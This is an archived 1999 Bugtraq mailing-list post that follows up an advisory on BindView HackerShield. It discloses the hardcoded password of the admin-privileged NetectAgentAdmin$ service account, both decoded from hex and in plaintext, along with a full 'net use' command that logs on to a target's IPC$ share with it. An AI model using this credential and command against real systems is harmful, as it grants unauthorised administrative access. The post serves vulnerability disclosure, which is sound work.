Bugtraq mailing list archives

Bindview Hackershield Password

From: ews () SECURITYFOCUS COM (Eric Schultze)
Date: Wed, 15 Sep 1999 18:40:53 -0700


This is a follow up to Simple Nomad's BindView HackerShield Advisory

Dumping the LSA password for the NetectAgentAdmin$ service, we get the
following hex codes:

6E 00 70 00 37 00 6D 00 34 00 71 00 4D 00 31 00
4D 00 37 00 56 00 54 00 09 00 3D 00

which equates to :
np7m4qM1M7VT<tab>=

The thirteenth character, a tab, makes this a difficult password to enter
from GUI applications.  It's best to resort to command line to logon with
the username/password combo

net use \\172.16.1.101\ipc$ "np7m4qM1M7VT   ="
/user:172.16.1.101\netectagentadmin$

"the CL above may be wrapped.)

NOTE: this account has admin privileges.

This information has been updated to the vulnerability record at:
http://www.securityfocus.com/bid.628.html

--eric

Current thread:

Cisco and Nmap Dos Lancashire, Andrew (Aug 31)
- Re: Cisco and Nmap Dos Mikael Olsson (Sep 02)
  - ProFTPD 1.2.0pre5 MacGyver (Sep 08)
  - Re: Cisco and Nmap Dos Lisa Napier (Sep 08)
  - 19 SCO 5.0.5+Skunware98 buffer overflows Brock Tellier (Sep 09)
- Re: Cisco and Nmap Dos Niklas Schiffler (Sep 02)
- IE 5.0 security vulnerabilities - ImportExportFavorites - at least creating and overwriting files, probably executing programs Georgi Guninski (Sep 09)
- <Possible follow-ups>
- Re: Cisco and Nmap Dos Travis Pugh (Sep 02)
- Re: Cisco and Nmap Dos Lancashire, Andrew (Sep 02)
- Re: Cisco and Nmap Dos Lisa Napier (Sep 07)
  - Bindview Hackershield Password Eric Schultze (Sep 15)
  - Re: Cisco and Nmap Dos Lisa Napier (Sep 15)